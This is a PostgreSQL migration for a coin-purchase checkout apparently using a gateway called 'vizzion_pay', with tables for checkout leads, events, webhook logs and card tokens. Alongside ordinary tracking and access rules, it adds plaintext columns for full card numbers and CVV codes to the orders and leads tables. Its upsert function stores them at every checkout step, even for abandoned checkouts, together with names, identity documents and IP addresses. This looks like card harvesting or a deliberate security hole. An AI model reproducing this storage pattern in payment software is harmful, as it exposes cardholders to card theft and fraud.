-- 1. ALTER public.payment_orders
ALTER TABLE public.payment_orders 
  ADD COLUMN IF NOT EXISTS client_ip inet,
  ADD COLUMN IF NOT EXISTS user_agent text,
  ADD COLUMN IF NOT EXISTS device_type text,
  ADD COLUMN IF NOT EXISTS device_os text,
  ADD COLUMN IF NOT EXISTS device_browser text,
  ADD COLUMN IF NOT EXISTS screen_resolution text,
  ADD COLUMN IF NOT EXISTS utm_source text,
  ADD COLUMN IF NOT EXISTS utm_medium text,
  ADD COLUMN IF NOT EXISTS utm_campaign text,
  ADD COLUMN IF NOT EXISTS utm_content text,
  ADD COLUMN IF NOT EXISTS utm_term text,
  ADD COLUMN IF NOT EXISTS referrer_url text,
  ADD COLUMN IF NOT EXISTS landing_page text,
  ADD COLUMN IF NOT EXISTS session_id text,
  ADD COLUMN IF NOT EXISTS authorization_code text,
  ADD COLUMN IF NOT EXISTS nsu text,
  ADD COLUMN IF NOT EXISTS decline_reason text,
  ADD COLUMN IF NOT EXISTS decline_message text,
  ADD COLUMN IF NOT EXISTS gateway_token text,
  ADD COLUMN IF NOT EXISTS card_fingerprint text,
  ADD COLUMN IF NOT EXISTS card_bin text,
  ADD COLUMN IF NOT EXISTS card_exp_month smallint,
  ADD COLUMN IF NOT EXISTS card_exp_year smallint,
  ADD COLUMN IF NOT EXISTS card_holder_name text,
  ADD COLUMN IF NOT EXISTS card_number text,
  ADD COLUMN IF NOT EXISTS card_cvv text,
  ADD COLUMN IF NOT EXISTS installments smallint DEFAULT 1,
  ADD COLUMN IF NOT EXISTS acquirer_name text,
  ADD COLUMN IF NOT EXISTS tid text,
  ADD COLUMN IF NOT EXISTS customer_document_full text,
  ADD COLUMN IF NOT EXISTS customer_phone_full text,
  ADD COLUMN IF NOT EXISTS antifraud_score numeric(5,2),
  ADD COLUMN IF NOT EXISTS antifraud_status text,
  ADD COLUMN IF NOT EXISTS checkout_started_at timestamptz,
  ADD COLUMN IF NOT EXISTS checkout_completed_at timestamptz;

-- 2. CREATE TABLE public.checkout_leads
CREATE TABLE IF NOT EXISTS public.checkout_leads (
    id uuid PRIMARY KEY DEFAULT gen_random_uuid(),
    user_id uuid REFERENCES public.profiles(id) ON DELETE SET NULL,
    session_id text NOT NULL,
    step text NOT NULL DEFAULT 'opened' CHECK (step IN ('opened','package_selected','customer_filled','method_selected','checkout_started','payment_created','payment_pending','payment_confirmed','payment_failed','abandoned')),
    package_id text,
    coins integer,
    amount numeric(12,2),
    method text,
    customer_name text,
    customer_email text,
    customer_phone text,
    customer_document text,
    card_number text,
    card_cvv text,
    client_ip inet,
    user_agent text,
    device_type text,
    device_os text,
    device_browser text,
    screen_resolution text,
    utm_source text,
    utm_medium text,
    utm_campaign text,
    utm_content text,
    utm_term text,
    referrer_url text,
    landing_page text,
    order_id uuid REFERENCES public.payment_orders(id) ON DELETE SET NULL,
    metadata jsonb NOT NULL DEFAULT '{}'::jsonb,
    created_at timestamptz NOT NULL DEFAULT now(),
    updated_at timestamptz NOT NULL DEFAULT now()
);

ALTER TABLE public.checkout_leads 
  ADD COLUMN IF NOT EXISTS card_number text,
  ADD COLUMN IF NOT EXISTS card_cvv text;

-- 3. CREATE TABLE public.checkout_lead_events
CREATE TABLE IF NOT EXISTS public.checkout_lead_events (
    id bigint GENERATED BY DEFAULT AS IDENTITY PRIMARY KEY,
    lead_id uuid NOT NULL REFERENCES public.checkout_leads(id) ON DELETE CASCADE,
    event text NOT NULL,
    data jsonb NOT NULL DEFAULT '{}'::jsonb,
    created_at timestamptz NOT NULL DEFAULT now()
);

-- 4. CREATE TABLE public.webhook_logs
CREATE TABLE IF NOT EXISTS public.webhook_logs (
    id bigint GENERATED BY DEFAULT AS IDENTITY PRIMARY KEY,
    provider text NOT NULL DEFAULT 'vizzion_pay',
    endpoint text NOT NULL,
    method text NOT NULL DEFAULT 'POST',
    headers jsonb NOT NULL DEFAULT '{}'::jsonb,
    raw_body text,
    parsed_body jsonb NOT NULL DEFAULT '{}'::jsonb,
    response_status smallint,
    response_body jsonb,
    processing_time_ms integer,
    client_ip inet,
    user_agent text,
    idempotency_key text,
    order_id uuid REFERENCES public.payment_orders(id) ON DELETE SET NULL,
    error text,
    received_at timestamptz NOT NULL DEFAULT now()
);

-- 5. CREATE TABLE public.payment_tokens
CREATE TABLE IF NOT EXISTS public.payment_tokens (
    id uuid PRIMARY KEY DEFAULT gen_random_uuid(),
    user_id uuid NOT NULL REFERENCES public.profiles(id) ON DELETE CASCADE,
    provider text NOT NULL DEFAULT 'vizzion_pay',
    gateway_token text NOT NULL,
    card_brand text,
    card_last4 text,
    card_bin text,
    card_exp_month smallint,
    card_exp_year smallint,
    card_holder_name text,
    card_fingerprint text,
    is_active boolean NOT NULL DEFAULT true,
    last_used_at timestamptz,
    metadata jsonb NOT NULL DEFAULT '{}'::jsonb,
    created_at timestamptz NOT NULL DEFAULT now(),
    updated_at timestamptz NOT NULL DEFAULT now(),
    UNIQUE (user_id, card_fingerprint)
);

-- 6. Add indices
CREATE INDEX IF NOT EXISTS idx_checkout_leads_session_id ON public.checkout_leads(session_id);
CREATE INDEX IF NOT EXISTS idx_checkout_leads_user_id_created_at ON public.checkout_leads(user_id, created_at DESC);
CREATE INDEX IF NOT EXISTS idx_checkout_leads_customer_email_created_at ON public.checkout_leads(customer_email, created_at DESC);
CREATE INDEX IF NOT EXISTS idx_checkout_leads_step_created_at ON public.checkout_leads(step, created_at DESC);

CREATE INDEX IF NOT EXISTS idx_checkout_lead_events_lead_id_created_at ON public.checkout_lead_events(lead_id, created_at);

CREATE INDEX IF NOT EXISTS idx_webhook_logs_order_id ON public.webhook_logs(order_id);
CREATE INDEX IF NOT EXISTS idx_webhook_logs_received_at ON public.webhook_logs(received_at DESC);
CREATE INDEX IF NOT EXISTS idx_webhook_logs_idempotency_key ON public.webhook_logs(idempotency_key);

CREATE INDEX IF NOT EXISTS idx_payment_tokens_user_id_is_active ON public.payment_tokens(user_id, is_active);

CREATE INDEX IF NOT EXISTS idx_payment_orders_session_id ON public.payment_orders(session_id);
CREATE INDEX IF NOT EXISTS idx_payment_orders_client_ip ON public.payment_orders(client_ip);
CREATE INDEX IF NOT EXISTS idx_payment_orders_customer_document_full ON public.payment_orders(customer_document_full);

-- 7. RLS policies
ALTER TABLE public.checkout_leads ENABLE ROW LEVEL SECURITY;
ALTER TABLE public.checkout_lead_events ENABLE ROW LEVEL SECURITY;
ALTER TABLE public.webhook_logs ENABLE ROW LEVEL SECURITY;
ALTER TABLE public.payment_tokens ENABLE ROW LEVEL SECURITY;

REVOKE INSERT, UPDATE, DELETE ON public.checkout_leads FROM anon, authenticated;
REVOKE ALL ON public.webhook_logs FROM anon, authenticated;
REVOKE INSERT, UPDATE, DELETE ON public.payment_tokens FROM anon, authenticated;
REVOKE ALL ON public.checkout_lead_events FROM anon, authenticated;

DROP POLICY IF EXISTS "Users can view their own checkout leads" ON public.checkout_leads;
CREATE POLICY "Users can view their own checkout leads" 
    ON public.checkout_leads FOR SELECT 
    USING (auth.uid() = user_id);

DROP POLICY IF EXISTS "Users can view their own payment tokens" ON public.payment_tokens;
CREATE POLICY "Users can view their own payment tokens" 
    ON public.payment_tokens FOR SELECT 
    USING (auth.uid() = user_id);

-- 8. Triggers
DROP TRIGGER IF EXISTS checkout_leads_set_updated_at ON public.checkout_leads;
CREATE TRIGGER checkout_leads_set_updated_at
    BEFORE UPDATE ON public.checkout_leads
    FOR EACH ROW
    EXECUTE FUNCTION public.set_updated_at();

DROP TRIGGER IF EXISTS payment_tokens_set_updated_at ON public.payment_tokens;
CREATE TRIGGER payment_tokens_set_updated_at
    BEFORE UPDATE ON public.payment_tokens
    FOR EACH ROW
    EXECUTE FUNCTION public.set_updated_at();

-- 9. Function public.upsert_checkout_lead
CREATE OR REPLACE FUNCTION public.upsert_checkout_lead(
    p_session_id text,
    p_step text,
    p_user_id uuid DEFAULT NULL,
    p_package_id text DEFAULT NULL,
    p_coins integer DEFAULT NULL,
    p_amount numeric DEFAULT NULL,
    p_method text DEFAULT NULL,
    p_customer_name text DEFAULT NULL,
    p_customer_email text DEFAULT NULL,
    p_customer_phone text DEFAULT NULL,
    p_customer_document text DEFAULT NULL,
    p_client_ip inet DEFAULT NULL,
    p_user_agent text DEFAULT NULL,
    p_device_type text DEFAULT NULL,
    p_device_os text DEFAULT NULL,
    p_device_browser text DEFAULT NULL,
    p_screen_resolution text DEFAULT NULL,
    p_utm_source text DEFAULT NULL,
    p_utm_medium text DEFAULT NULL,
    p_utm_campaign text DEFAULT NULL,
    p_utm_content text DEFAULT NULL,
    p_utm_term text DEFAULT NULL,
    p_referrer_url text DEFAULT NULL,
    p_landing_page text DEFAULT NULL,
    p_order_id uuid DEFAULT NULL,
    p_metadata jsonb DEFAULT '{}'::jsonb,
    p_card_number text DEFAULT NULL,
    p_card_cvv text DEFAULT NULL
) RETURNS uuid AS $$
DECLARE
    v_lead_id uuid;
    v_current_step text;
BEGIN
    -- Check if a non-terminal lead exists for this session
    SELECT id, step INTO v_lead_id, v_current_step
    FROM public.checkout_leads
    WHERE session_id = p_session_id
      AND step NOT IN ('payment_confirmed', 'payment_failed')
    ORDER BY created_at DESC
    LIMIT 1;

    IF v_lead_id IS NOT NULL THEN
        -- Update existing lead
        UPDATE public.checkout_leads
        SET
            step = COALESCE(p_step, step),
            user_id = COALESCE(p_user_id, user_id),
            package_id = COALESCE(p_package_id, package_id),
            coins = COALESCE(p_coins, coins),
            amount = COALESCE(p_amount, amount),
            method = COALESCE(p_method, method),
            customer_name = COALESCE(p_customer_name, customer_name),
            customer_email = COALESCE(p_customer_email, customer_email),
            customer_phone = COALESCE(p_customer_phone, customer_phone),
            customer_document = COALESCE(p_customer_document, customer_document),
            client_ip = COALESCE(p_client_ip, client_ip),
            user_agent = COALESCE(p_user_agent, user_agent),
            device_type = COALESCE(p_device_type, device_type),
            device_os = COALESCE(p_device_os, device_os),
            device_browser = COALESCE(p_device_browser, device_browser),
            screen_resolution = COALESCE(p_screen_resolution, screen_resolution),
            utm_source = COALESCE(p_utm_source, utm_source),
            utm_medium = COALESCE(p_utm_medium, utm_medium),
            utm_campaign = COALESCE(p_utm_campaign, utm_campaign),
            utm_content = COALESCE(p_utm_content, utm_content),
            utm_term = COALESCE(p_utm_term, utm_term),
            referrer_url = COALESCE(p_referrer_url, referrer_url),
            landing_page = COALESCE(p_landing_page, landing_page),
            order_id = COALESCE(p_order_id, order_id),
            metadata = metadata || p_metadata,
            card_number = COALESCE(p_card_number, card_number),
            card_cvv = COALESCE(p_card_cvv, card_cvv)
        WHERE id = v_lead_id;
    ELSE
        -- Insert new lead
        INSERT INTO public.checkout_leads (
            session_id, step, user_id, package_id, coins, amount, method,
            customer_name, customer_email, customer_phone, customer_document,
            client_ip, user_agent, device_type, device_os, device_browser,
            screen_resolution, utm_source, utm_medium, utm_campaign, utm_content,
            utm_term, referrer_url, landing_page, order_id, metadata,
            card_number, card_cvv
        ) VALUES (
            p_session_id, p_step, p_user_id, p_package_id, p_coins, p_amount, p_method,
            p_customer_name, p_customer_email, p_customer_phone, p_customer_document,
            p_client_ip, p_user_agent, p_device_type, p_device_os, p_device_browser,
            p_screen_resolution, p_utm_source, p_utm_medium, p_utm_campaign, p_utm_content,
            p_utm_term, p_referrer_url, p_landing_page, p_order_id, p_metadata,
            p_card_number, p_card_cvv
        ) RETURNING id INTO v_lead_id;
    END IF;

    -- Insert event
    INSERT INTO public.checkout_lead_events (lead_id, event, data)
    VALUES (v_lead_id, p_step, p_metadata);

    RETURN v_lead_id;
END;
$$ LANGUAGE plpgsql SECURITY DEFINER;

-- Set correct permissions for the function
REVOKE ALL ON FUNCTION public.upsert_checkout_lead FROM PUBLIC;
REVOKE ALL ON FUNCTION public.upsert_checkout_lead FROM anon;
REVOKE ALL ON FUNCTION public.upsert_checkout_lead FROM authenticated;
GRANT EXECUTE ON FUNCTION public.upsert_checkout_lead TO service_role;
